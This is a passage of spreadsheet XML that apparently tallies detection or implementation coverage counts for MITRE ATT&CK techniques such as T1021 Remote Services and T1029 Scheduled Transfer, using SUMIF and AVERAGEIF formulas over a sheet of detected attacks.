      <c r="AJ8" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B8,'Tabla 2 - Ataques detec (Imple)'!$AC$3:$AC$112)</f>
        <v>7</v>
      </c>
      <c r="AK8" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B8,'Tabla 2 - Ataques detec (Imple)'!AE$3:AE$112)</f>
        <v>55</v>
      </c>
      <c r="AL8" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B8,'Tabla 2 - Ataques detec (Imple)'!AF$3:AF$112)</f>
        <v>12</v>
      </c>
      <c r="AM8" s="322" t="str">
        <f t="shared" si="5"/>
        <v>12 (55)</v>
      </c>
      <c r="AN8" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B8,'Tabla 2 - Ataques detec (Imple)'!$AG$3:$AG$112)</f>
        <v>5</v>
      </c>
      <c r="AO8" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B8,'Tabla 2 - Ataques detec (Imple)'!$AI$3:$AI$112)</f>
        <v>1</v>
      </c>
      <c r="AP8" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B8,'Tabla 2 - Ataques detec (Imple)'!$AH$3:$AH$112)</f>
        <v>9</v>
      </c>
      <c r="AQ8" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B8,'Tabla 2 - Ataques detec (Imple)'!AJ$3:AJ$112)</f>
        <v>0</v>
      </c>
      <c r="AR8" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B8,'Tabla 2 - Ataques detec (Imple)'!AK$3:AK$112)</f>
        <v>0</v>
      </c>
      <c r="AS8" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT8" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B8,'Tabla 2 - Ataques detec (Imple)'!$AL$3:$AL$112)</f>
        <v>0</v>
      </c>
      <c r="AU8" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B8,'Tabla 2 - Ataques detec (Imple)'!$AN$3:$AN$112)</f>
        <v>0</v>
      </c>
      <c r="AV8" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B8,'Tabla 2 - Ataques detec (Imple)'!$AM$3:$AM$112)</f>
        <v>0</v>
      </c>
      <c r="AW8" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B8,'Tabla 2 - Ataques detec (Imple)'!AO$3:AO$112)</f>
        <v>28</v>
      </c>
      <c r="AX8" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B8,'Tabla 2 - Ataques detec (Imple)'!AP$3:AP$112)</f>
        <v>1</v>
      </c>
      <c r="AY8" s="322" t="str">
        <f t="shared" si="7"/>
        <v>1 (28)</v>
      </c>
      <c r="AZ8" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B8,'Tabla 2 - Ataques detec (Imple)'!$AQ$3:$AQ$112)</f>
        <v>1</v>
      </c>
      <c r="BA8" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B8,'Tabla 2 - Ataques detec (Imple)'!$AS$3:$AS$112)</f>
        <v>1</v>
      </c>
      <c r="BB8" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B8,'Tabla 2 - Ataques detec (Imple)'!$AR$3:$AR$112)</f>
        <v>1</v>
      </c>
      <c r="BC8" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B8,'Tabla 2 - Ataques detec (Imple)'!AT$3:AT$112)</f>
        <v>45</v>
      </c>
      <c r="BD8" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B8,'Tabla 2 - Ataques detec (Imple)'!AU$3:AU$112)</f>
        <v>4</v>
      </c>
      <c r="BE8" s="4" t="str">
        <f t="shared" si="8"/>
        <v>4 (45)</v>
      </c>
      <c r="BF8" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B8,'Tabla 2 - Ataques detec (Imple)'!$AV$3:$AV$112)</f>
        <v>3</v>
      </c>
      <c r="BG8" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B8,'Tabla 2 - Ataques detec (Imple)'!$AX$3:$AX$112)</f>
        <v>1</v>
      </c>
      <c r="BH8" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B8,'Tabla 2 - Ataques detec (Imple)'!$AW$3:$AW$112)</f>
        <v>4</v>
      </c>
      <c r="BI8" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B8,'Tabla 2 - Ataques detec (Imple)'!AY$3:AY$112)</f>
        <v>1</v>
      </c>
      <c r="BJ8" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B8,'Tabla 2 - Ataques detec (Imple)'!AZ$3:AZ$112)</f>
        <v>1</v>
      </c>
      <c r="BK8" s="322" t="str">
        <f t="shared" si="9"/>
        <v>1 (1)</v>
      </c>
      <c r="BL8" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B8,'Tabla 2 - Ataques detec (Imple)'!BA$3:BA$112)</f>
        <v>1</v>
      </c>
      <c r="BM8" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B8,'Tabla 2 - Ataques detec (Imple)'!$BC$3:$BC$112)</f>
        <v>1</v>
      </c>
      <c r="BN8" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B8,'Tabla 2 - Ataques detec (Imple)'!$BB$3:$BB$112)</f>
        <v>1</v>
      </c>
      <c r="BO8" s="288">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B8,'Tabla 2 - Ataques detec (Imple)'!BD$3:BD$112)</f>
        <v>51</v>
      </c>
      <c r="BP8" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B8,'Tabla 2 - Ataques detec (Imple)'!BE$3:BE$112)</f>
        <v>24</v>
      </c>
      <c r="BQ8" s="4" t="str">
        <f t="shared" si="10"/>
        <v>24 (51)</v>
      </c>
      <c r="BR8" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B8,'Tabla 2 - Ataques detec (Imple)'!BF$3:BF$112)</f>
        <v>1</v>
      </c>
      <c r="BS8" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B8,'Tabla 2 - Ataques detec (Imple)'!BG$3:BG$112)</f>
        <v>4</v>
      </c>
      <c r="BT8" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B8,'Tabla 2 - Ataques detec (Imple)'!$BI$3:$BI$112)</f>
        <v>1</v>
      </c>
      <c r="BU8" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B8,'Tabla 2 - Ataques detec (Imple)'!$BH$3:$BH$112)</f>
        <v>23</v>
      </c>
      <c r="BV8" s="292">
        <v>1</v>
      </c>
      <c r="BW8" s="322">
        <v>1</v>
      </c>
      <c r="BX8" s="4" t="str">
        <f t="shared" si="11"/>
        <v>1 (1)</v>
      </c>
      <c r="BY8" s="12">
        <v>1</v>
      </c>
      <c r="BZ8" s="13">
        <v>1</v>
      </c>
      <c r="CA8" s="394">
        <v>1</v>
      </c>
      <c r="CB8" s="288">
        <v>2</v>
      </c>
      <c r="CC8" s="4">
        <v>2</v>
      </c>
      <c r="CD8" s="4" t="str">
        <f t="shared" si="12"/>
        <v>2 (2)</v>
      </c>
      <c r="CE8" s="4">
        <v>1</v>
      </c>
      <c r="CF8" s="4">
        <v>1</v>
      </c>
      <c r="CG8" s="13">
        <v>1</v>
      </c>
      <c r="CH8" s="394">
        <v>1</v>
      </c>
    </row>
    <row r="9" spans="1:93" ht="15" customHeight="1">
      <c r="A9" s="4">
        <f t="shared" si="13"/>
        <v>7</v>
      </c>
      <c r="B9" s="4" t="str">
        <f>IFERROR(VLOOKUP(A9,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1021</v>
      </c>
      <c r="C9" s="493" t="str">
        <f>IFERROR(VLOOKUP(B9,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Remote Services</v>
      </c>
      <c r="D9" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B9)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E9" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B9,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>1</v>
      </c>
      <c r="F9" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (1)</v>
      </c>
      <c r="G9" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B9,'Tabla 2 - Ataques detec (Imple)'!F$3:F$112)</f>
        <v>3</v>
      </c>
      <c r="H9" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B9,'Tabla 2 - Ataques detec (Imple)'!G$3:G$112)</f>
        <v>1</v>
      </c>
      <c r="I9" s="322" t="str">
        <f t="shared" si="0"/>
        <v>1 (3)</v>
      </c>
      <c r="J9" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B9,'Tabla 2 - Ataques detec (Imple)'!$H$3:$H$112)</f>
        <v>1</v>
      </c>
      <c r="K9" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B9,'Tabla 2 - Ataques detec (Imple)'!$J$3:$J$112)</f>
        <v>1</v>
      </c>
      <c r="L9" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B9,'Tabla 2 - Ataques detec (Imple)'!$I$3:$I$112)</f>
        <v>1</v>
      </c>
      <c r="M9" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B9,'Tabla 2 - Ataques detec (Imple)'!K$3:K$112)</f>
        <v>0</v>
      </c>
      <c r="N9" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B9,'Tabla 2 - Ataques detec (Imple)'!L$3:L$112)</f>
        <v>0</v>
      </c>
      <c r="O9" s="322" t="str">
        <f t="shared" si="1"/>
        <v>0 (0)</v>
      </c>
      <c r="P9" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B9,'Tabla 2 - Ataques detec (Imple)'!$M$3:$M$112)</f>
        <v>0</v>
      </c>
      <c r="Q9" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B9,'Tabla 2 - Ataques detec (Imple)'!$O$3:$O$112)</f>
        <v>0</v>
      </c>
      <c r="R9" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B9,'Tabla 2 - Ataques detec (Imple)'!$N$3:$N$112)</f>
        <v>0</v>
      </c>
      <c r="S9" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B9,'Tabla 2 - Ataques detec (Imple)'!P$3:P$112)</f>
        <v>3</v>
      </c>
      <c r="T9" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B9,'Tabla 2 - Ataques detec (Imple)'!Q$3:Q$112)</f>
        <v>1</v>
      </c>
      <c r="U9" s="4" t="str">
        <f t="shared" si="2"/>
        <v>1 (3)</v>
      </c>
      <c r="V9" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B9,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>1</v>
      </c>
      <c r="W9" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B9,'Tabla 2 - Ataques detec (Imple)'!$T$3:$T$112)</f>
        <v>1</v>
      </c>
      <c r="X9" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B9,'Tabla 2 - Ataques detec (Imple)'!$S$3:$S$112)</f>
        <v>1</v>
      </c>
      <c r="Y9" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B9,'Tabla 2 - Ataques detec (Imple)'!U$3:U$112)</f>
        <v>4</v>
      </c>
      <c r="Z9" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B9,'Tabla 2 - Ataques detec (Imple)'!V$3:V$112)</f>
        <v>2</v>
      </c>
      <c r="AA9" s="322" t="str">
        <f t="shared" si="3"/>
        <v>2 (4)</v>
      </c>
      <c r="AB9" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B9,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>1</v>
      </c>
      <c r="AC9" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B9,'Tabla 2 - Ataques detec (Imple)'!$Y$3:$Y$112)</f>
        <v>1</v>
      </c>
      <c r="AD9" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B9,'Tabla 2 - Ataques detec (Imple)'!$X$3:$X$112)</f>
        <v>1</v>
      </c>
      <c r="AE9" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B9,'Tabla 2 - Ataques detec (Imple)'!Z$3:Z$112)</f>
        <v>4</v>
      </c>
      <c r="AF9" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B9,'Tabla 2 - Ataques detec (Imple)'!AA$3:AA$112)</f>
        <v>2</v>
      </c>
      <c r="AG9" s="322" t="str">
        <f t="shared" si="4"/>
        <v>2 (4)</v>
      </c>
      <c r="AH9" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B9,'Tabla 2 - Ataques detec (Imple)'!$AB$3:$AB$112)</f>
        <v>2</v>
      </c>
      <c r="AI9" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B9,'Tabla 2 - Ataques detec (Imple)'!$AD$3:$AD$112)</f>
        <v>1</v>
      </c>
      <c r="AJ9" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B9,'Tabla 2 - Ataques detec (Imple)'!$AC$3:$AC$112)</f>
        <v>1</v>
      </c>
      <c r="AK9" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B9,'Tabla 2 - Ataques detec (Imple)'!AE$3:AE$112)</f>
        <v>8</v>
      </c>
      <c r="AL9" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B9,'Tabla 2 - Ataques detec (Imple)'!AF$3:AF$112)</f>
        <v>4</v>
      </c>
      <c r="AM9" s="322" t="str">
        <f t="shared" si="5"/>
        <v>4 (8)</v>
      </c>
      <c r="AN9" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B9,'Tabla 2 - Ataques detec (Imple)'!$AG$3:$AG$112)</f>
        <v>4</v>
      </c>
      <c r="AO9" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B9,'Tabla 2 - Ataques detec (Imple)'!$AI$3:$AI$112)</f>
        <v>1</v>
      </c>
      <c r="AP9" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B9,'Tabla 2 - Ataques detec (Imple)'!$AH$3:$AH$112)</f>
        <v>1</v>
      </c>
      <c r="AQ9" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B9,'Tabla 2 - Ataques detec (Imple)'!AJ$3:AJ$112)</f>
        <v>0</v>
      </c>
      <c r="AR9" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B9,'Tabla 2 - Ataques detec (Imple)'!AK$3:AK$112)</f>
        <v>0</v>
      </c>
      <c r="AS9" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT9" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B9,'Tabla 2 - Ataques detec (Imple)'!$AL$3:$AL$112)</f>
        <v>0</v>
      </c>
      <c r="AU9" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B9,'Tabla 2 - Ataques detec (Imple)'!$AN$3:$AN$112)</f>
        <v>0</v>
      </c>
      <c r="AV9" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B9,'Tabla 2 - Ataques detec (Imple)'!$AM$3:$AM$112)</f>
        <v>0</v>
      </c>
      <c r="AW9" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B9,'Tabla 2 - Ataques detec (Imple)'!AO$3:AO$112)</f>
        <v>1</v>
      </c>
      <c r="AX9" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B9,'Tabla 2 - Ataques detec (Imple)'!AP$3:AP$112)</f>
        <v>1</v>
      </c>
      <c r="AY9" s="322" t="str">
        <f t="shared" si="7"/>
        <v>1 (1)</v>
      </c>
      <c r="AZ9" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B9,'Tabla 2 - Ataques detec (Imple)'!$AQ$3:$AQ$112)</f>
        <v>1</v>
      </c>
      <c r="BA9" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B9,'Tabla 2 - Ataques detec (Imple)'!$AS$3:$AS$112)</f>
        <v>1</v>
      </c>
      <c r="BB9" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B9,'Tabla 2 - Ataques detec (Imple)'!$AR$3:$AR$112)</f>
        <v>1</v>
      </c>
      <c r="BC9" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B9,'Tabla 2 - Ataques detec (Imple)'!AT$3:AT$112)</f>
        <v>4</v>
      </c>
      <c r="BD9" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B9,'Tabla 2 - Ataques detec (Imple)'!AU$3:AU$112)</f>
        <v>2</v>
      </c>
      <c r="BE9" s="4" t="str">
        <f t="shared" si="8"/>
        <v>2 (4)</v>
      </c>
      <c r="BF9" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B9,'Tabla 2 - Ataques detec (Imple)'!$AV$3:$AV$112)</f>
        <v>2</v>
      </c>
      <c r="BG9" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B9,'Tabla 2 - Ataques detec (Imple)'!$AX$3:$AX$112)</f>
        <v>1</v>
      </c>
      <c r="BH9" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B9,'Tabla 2 - Ataques detec (Imple)'!$AW$3:$AW$112)</f>
        <v>1</v>
      </c>
      <c r="BI9" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B9,'Tabla 2 - Ataques detec (Imple)'!AY$3:AY$112)</f>
        <v>1</v>
      </c>
      <c r="BJ9" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B9,'Tabla 2 - Ataques detec (Imple)'!AZ$3:AZ$112)</f>
        <v>1</v>
      </c>
      <c r="BK9" s="322" t="str">
        <f t="shared" si="9"/>
        <v>1 (1)</v>
      </c>
      <c r="BL9" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B9,'Tabla 2 - Ataques detec (Imple)'!BA$3:BA$112)</f>
        <v>1</v>
      </c>
      <c r="BM9" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B9,'Tabla 2 - Ataques detec (Imple)'!$BC$3:$BC$112)</f>
        <v>1</v>
      </c>
      <c r="BN9" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B9,'Tabla 2 - Ataques detec (Imple)'!$BB$3:$BB$112)</f>
        <v>1</v>
      </c>
      <c r="BO9" s="288">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B9,'Tabla 2 - Ataques detec (Imple)'!BD$3:BD$112)</f>
        <v>2</v>
      </c>
      <c r="BP9" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B9,'Tabla 2 - Ataques detec (Imple)'!BE$3:BE$112)</f>
        <v>2</v>
      </c>
      <c r="BQ9" s="4" t="str">
        <f t="shared" si="10"/>
        <v>2 (2)</v>
      </c>
      <c r="BR9" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B9,'Tabla 2 - Ataques detec (Imple)'!BF$3:BF$112)</f>
        <v>1</v>
      </c>
      <c r="BS9" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B9,'Tabla 2 - Ataques detec (Imple)'!BG$3:BG$112)</f>
        <v>1</v>
      </c>
      <c r="BT9" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B9,'Tabla 2 - Ataques detec (Imple)'!$BI$3:$BI$112)</f>
        <v>1</v>
      </c>
      <c r="BU9" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B9,'Tabla 2 - Ataques detec (Imple)'!$BH$3:$BH$112)</f>
        <v>1</v>
      </c>
      <c r="BV9" s="292">
        <v>1</v>
      </c>
      <c r="BW9" s="322">
        <v>1</v>
      </c>
      <c r="BX9" s="4" t="str">
        <f t="shared" si="11"/>
        <v>1 (1)</v>
      </c>
      <c r="BY9" s="12">
        <v>1</v>
      </c>
      <c r="BZ9" s="13">
        <v>1</v>
      </c>
      <c r="CA9" s="394">
        <v>1</v>
      </c>
      <c r="CB9" s="288">
        <v>2</v>
      </c>
      <c r="CC9" s="4">
        <v>2</v>
      </c>
      <c r="CD9" s="4" t="str">
        <f t="shared" si="12"/>
        <v>2 (2)</v>
      </c>
      <c r="CE9" s="4">
        <v>1</v>
      </c>
      <c r="CF9" s="4">
        <v>1</v>
      </c>
      <c r="CG9" s="13">
        <v>1</v>
      </c>
      <c r="CH9" s="394">
        <v>1</v>
      </c>
    </row>
    <row r="10" spans="1:93" ht="15" customHeight="1">
      <c r="A10" s="4">
        <f t="shared" si="13"/>
        <v>8</v>
      </c>
      <c r="B10" s="4" t="str">
        <f>IFERROR(VLOOKUP(A10,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1029</v>
      </c>
      <c r="C10" s="493" t="str">
        <f>IFERROR(VLOOKUP(B10,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Scheduled Transfer</v>
      </c>
      <c r="D10" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B10)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E10" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B10,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>9</v>
      </c>
      <c r="F10" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (9)</v>
      </c>
      <c r="G10" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B10,'Tabla 2 - Ataques detec (Imple)'!F$3:F$112)</f>
        <v>5</v>
      </c>
      <c r="H10" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B10,'Tabla 2 - Ataques detec (Imple)'!G$3:G$112)</f>
        <v>2</v>
      </c>
      <c r="I10" s="322" t="str">
        <f t="shared" si="0"/>
        <v>2 (5)</v>
      </c>
      <c r="J10" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B10,'Tabla 2 - Ataques detec (Imple)'!$H$3:$H$112)</f>
        <v>2</v>
      </c>
      <c r="K10" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B10,'Tabla 2 - Ataques detec (Imple)'!$J$3:$J$112)</f>
        <v>1</v>
      </c>
      <c r="L10" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B10,'Tabla 2 - Ataques detec (Imple)'!$I$3:$I$112)</f>
        <v>1</v>
      </c>
      <c r="M10" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B10,'Tabla 2 - Ataques detec (Imple)'!K$3:K$112)</f>
        <v>3</v>
      </c>
      <c r="N10" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B10,'Tabla 2 - Ataques detec (Imple)'!L$3:L$112)</f>
        <v>3</v>
      </c>
      <c r="O10" s="322" t="str">
        <f t="shared" si="1"/>
        <v>3 (3)</v>
      </c>
      <c r="P10" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B10,'Tabla 2 - Ataques detec (Imple)'!$M$3:$M$112)</f>
        <v>3</v>
      </c>
      <c r="Q10" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B10,'Tabla 2 - Ataques detec (Imple)'!$O$3:$O$112)</f>
        <v>1</v>
      </c>
      <c r="R10" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B10,'Tabla 2 - Ataques detec (Imple)'!$N$3:$N$112)</f>
        <v>1</v>
      </c>
      <c r="S10" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B10,'Tabla 2 - Ataques detec (Imple)'!P$3:P$112)</f>
        <v>8</v>
      </c>
      <c r="T10" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B10,'Tabla 2 - Ataques detec (Imple)'!Q$3:Q$112)</f>
        <v>5</v>
      </c>
      <c r="U10" s="4" t="str">
        <f t="shared" si="2"/>
        <v>5 (8)</v>
      </c>
      <c r="V10" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B10,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>5</v>
      </c>
      <c r="W10" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B10,'Tabla 2 - Ataques detec (Imple)'!$T$3:$T$112)</f>
        <v>1</v>
      </c>
      <c r="X10" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B10,'Tabla 2 - Ataques detec (Imple)'!$S$3:$S$112)</f>
        <v>2</v>
      </c>
      <c r="Y10" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B10,'Tabla 2 - Ataques detec (Imple)'!U$3:U$112)</f>
        <v>63</v>
      </c>
      <c r="Z10" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B10,'Tabla 2 - Ataques detec (Imple)'!V$3:V$112)</f>
        <v>8</v>
      </c>
      <c r="AA10" s="322" t="str">
        <f t="shared" si="3"/>
        <v>8 (63)</v>
      </c>
      <c r="AB10" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B10,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>5</v>
      </c>
      <c r="AC10" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B10,'Tabla 2 - Ataques detec (Imple)'!$Y$3:$Y$112)</f>
        <v>1</v>
      </c>
      <c r="AD10" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B10,'Tabla 2 - Ataques detec (Imple)'!$X$3:$X$112)</f>
        <v>7</v>
      </c>
      <c r="AE10" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B10,'Tabla 2 - Ataques detec (Imple)'!Z$3:Z$112)</f>
        <v>7</v>
      </c>
      <c r="AF10" s="392">
